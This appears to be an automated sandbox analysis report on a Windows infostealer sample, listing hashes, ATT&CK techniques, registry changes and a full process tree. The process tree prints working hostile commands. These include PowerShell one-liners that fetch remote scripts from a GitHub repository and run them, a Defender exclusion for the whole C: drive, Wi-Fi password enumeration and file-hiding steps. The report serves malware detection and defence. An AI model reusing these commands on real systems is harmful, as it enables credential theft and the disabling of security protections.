77dbeb3e4ee87a33f06611428d479e4e9b4c3de2a65d8fc3d8403c8dfd70fa14

Analysis

max time kernel
139s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 03:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
Size

14.0MB
MD5

fbf595ccb3a26a991f0dcaf5274dbb8c
SHA1

2db2d7706398199769ba592e985bc0d598203ee9
SHA256

77dbeb3e4ee87a33f06611428d479e4e9b4c3de2a65d8fc3d8403c8dfd70fa14
SHA512

00e20cbf499840826efd277e78f2e105fcff9ffc2ab05496939802b680a45190d8df1c2730541078eca43a97851cfdd3cd8ca6e1a3834bd06faf6753cbb114b8
SSDEEP

196608:PzJfx6npoO2feFbQ8W47ibVIEc79PVJUW9ydW:PZxTOI/8D6IPWmU

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vboxmouse.sys	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	2492	powershell.exe
16	3696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2492	powershell.exe
3696	powershell.exe
4556	powershell.exe
1948	PowerShell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmemctl.sys	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2836	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com
14	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3016	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
448	netsh.exe
3220	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
548	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2700	ipconfig.exe
984	ipconfig.exe
548	NETSTAT.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
3028	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4556	powershell.exe
3696	powershell.exe
1948	PowerShell.exe
2492	powershell.exe
4556	powershell.exe
1948	PowerShell.exe
3696	powershell.exe
2492	powershell.exe
2492	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	1948	PowerShell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: 33	2316	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2316	AUDIODG.EXE
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2492	powershell.exe
Token: SeSecurityPrivilege	2492	powershell.exe
Token: SeTakeOwnershipPrivilege	2492	powershell.exe
Token: SeLoadDriverPrivilege	2492	powershell.exe
Token: SeSystemProfilePrivilege	2492	powershell.exe
Token: SeSystemtimePrivilege	2492	powershell.exe
Token: SeProfSingleProcessPrivilege	2492	powershell.exe
Token: SeIncBasePriorityPrivilege	2492	powershell.exe
Token: SeCreatePagefilePrivilege	2492	powershell.exe
Token: SeBackupPrivilege	2492	powershell.exe
Token: SeRestorePrivilege	2492	powershell.exe
Token: SeShutdownPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeSystemEnvironmentPrivilege	2492	powershell.exe
Token: SeRemoteShutdownPrivilege	2492	powershell.exe
Token: SeUndockPrivilege	2492	powershell.exe
Token: SeManageVolumePrivilege	2492	powershell.exe
Token: 33	2492	powershell.exe
Token: 34	2492	powershell.exe
Token: 35	2492	powershell.exe
Token: 36	2492	powershell.exe
Token: SeIncreaseQuotaPrivilege	2492	powershell.exe
Token: SeSecurityPrivilege	2492	powershell.exe
Token: SeTakeOwnershipPrivilege	2492	powershell.exe
Token: SeLoadDriverPrivilege	2492	powershell.exe
Token: SeSystemProfilePrivilege	2492	powershell.exe
Token: SeSystemtimePrivilege	2492	powershell.exe
Token: SeProfSingleProcessPrivilege	2492	powershell.exe
Token: SeIncBasePriorityPrivilege	2492	powershell.exe
Token: SeCreatePagefilePrivilege	2492	powershell.exe
Token: SeBackupPrivilege	2492	powershell.exe
Token: SeRestorePrivilege	2492	powershell.exe
Token: SeShutdownPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeSystemEnvironmentPrivilege	2492	powershell.exe
Token: SeRemoteShutdownPrivilege	2492	powershell.exe
Token: SeUndockPrivilege	2492	powershell.exe
Token: SeManageVolumePrivilege	2492	powershell.exe
Token: 33	2492	powershell.exe
Token: 34	2492	powershell.exe
Token: 35	2492	powershell.exe
Token: 36	2492	powershell.exe
Token: SeIncreaseQuotaPrivilege	2492	powershell.exe
Token: SeSecurityPrivilege	2492	powershell.exe
Token: SeTakeOwnershipPrivilege	2492	powershell.exe
Token: SeLoadDriverPrivilege	2492	powershell.exe
Token: SeSystemProfilePrivilege	2492	powershell.exe
Token: SeSystemtimePrivilege	2492	powershell.exe
Token: SeProfSingleProcessPrivilege	2492	powershell.exe
Token: SeIncBasePriorityPrivilege	2492	powershell.exe
Token: SeCreatePagefilePrivilege	2492	powershell.exe
Token: SeBackupPrivilege	2492	powershell.exe
Token: SeRestorePrivilege	2492	powershell.exe
Token: SeShutdownPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeSystemEnvironmentPrivilege	2492	powershell.exe
Token: SeRemoteShutdownPrivilege	2492	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 2492	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	85
PID 4972 wrote to memory of 2492	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	85
PID 4972 wrote to memory of 4556	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	86
PID 4972 wrote to memory of 4556	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	86
PID 4972 wrote to memory of 3696	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	88
PID 4972 wrote to memory of 3696	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	88
PID 4972 wrote to memory of 976	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	89
PID 4972 wrote to memory of 976	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	89
PID 4972 wrote to memory of 1948	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	90
PID 4972 wrote to memory of 1948	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	90
PID 4972 wrote to memory of 4552	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	91
PID 4972 wrote to memory of 4552	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	91
PID 4972 wrote to memory of 716	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	92
PID 4972 wrote to memory of 716	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	92
PID 4552 wrote to memory of 1636	4552	cmd.exe	93
PID 4552 wrote to memory of 1636	4552	cmd.exe	93
PID 3696 wrote to memory of 4880	3696	powershell.exe	94
PID 3696 wrote to memory of 4880	3696	powershell.exe	94
PID 2492 wrote to memory of 2276	2492	powershell.exe	95
PID 2492 wrote to memory of 2276	2492	powershell.exe	95
PID 2276 wrote to memory of 3676	2276	csc.exe	96
PID 2276 wrote to memory of 3676	2276	csc.exe	96
PID 4880 wrote to memory of 4392	4880	csc.exe	116
PID 4880 wrote to memory of 4392	4880	csc.exe	116
PID 4972 wrote to memory of 3028	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	99
PID 4972 wrote to memory of 3028	4972	2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe	99
PID 2492 wrote to memory of 448	2492	powershell.exe	104
PID 2492 wrote to memory of 448	2492	powershell.exe	104
PID 2492 wrote to memory of 4628	2492	powershell.exe	107
PID 2492 wrote to memory of 4628	2492	powershell.exe	107
PID 4628 wrote to memory of 2448	4628	net.exe	108
PID 4628 wrote to memory of 2448	4628	net.exe	108
PID 2492 wrote to memory of 2836	2492	powershell.exe	109
PID 2492 wrote to memory of 2836	2492	powershell.exe	109
PID 2492 wrote to memory of 1956	2492	powershell.exe	110
PID 2492 wrote to memory of 1956	2492	powershell.exe	110
PID 2492 wrote to memory of 1640	2492	powershell.exe	112
PID 2492 wrote to memory of 1640	2492	powershell.exe	112
PID 1640 wrote to memory of 1756	1640	net.exe	113
PID 1640 wrote to memory of 1756	1640	net.exe	113
PID 2492 wrote to memory of 984	2492	powershell.exe	114
PID 2492 wrote to memory of 984	2492	powershell.exe	114
PID 2492 wrote to memory of 1200	2492	powershell.exe	115
PID 2492 wrote to memory of 1200	2492	powershell.exe	115
PID 1200 wrote to memory of 4392	1200	net.exe	116
PID 1200 wrote to memory of 4392	1200	net.exe	116
PID 2492 wrote to memory of 808	2492	powershell.exe	117
PID 2492 wrote to memory of 808	2492	powershell.exe	117
PID 2492 wrote to memory of 548	2492	powershell.exe	118
PID 2492 wrote to memory of 548	2492	powershell.exe	118
PID 2492 wrote to memory of 4344	2492	powershell.exe	119
PID 2492 wrote to memory of 4344	2492	powershell.exe	119
PID 2492 wrote to memory of 2700	2492	powershell.exe	120
PID 2492 wrote to memory of 2700	2492	powershell.exe	120
PID 2492 wrote to memory of 1908	2492	powershell.exe	121
PID 2492 wrote to memory of 1908	2492	powershell.exe	121
PID 2492 wrote to memory of 3016	2492	powershell.exe	122
PID 2492 wrote to memory of 3016	2492	powershell.exe	122
PID 2492 wrote to memory of 3220	2492	powershell.exe	123
PID 2492 wrote to memory of 3220	2492	powershell.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
716	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe"
1⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2492
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6939.tmp" "c:\Users\Admin\AppData\Local\Temp\qtop5ekd\CSCA217C1AF72CE478085479C8BE11A7F7C.TMP"
      4⤵
      PID:3676
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:448
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2448
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2836
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1956
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:1756
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:984
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:808
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:548
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4344
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2700
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1908
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:3016
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D31.tmp" "c:\Users\Admin\AppData\Local\Temp\ocsvchmx\CSC3AA5B6DA58544110B93A171C23E24E30.TMP"
      4⤵
      PID:4392
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:976
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:1636
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:716
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3028

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x528 0x520
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

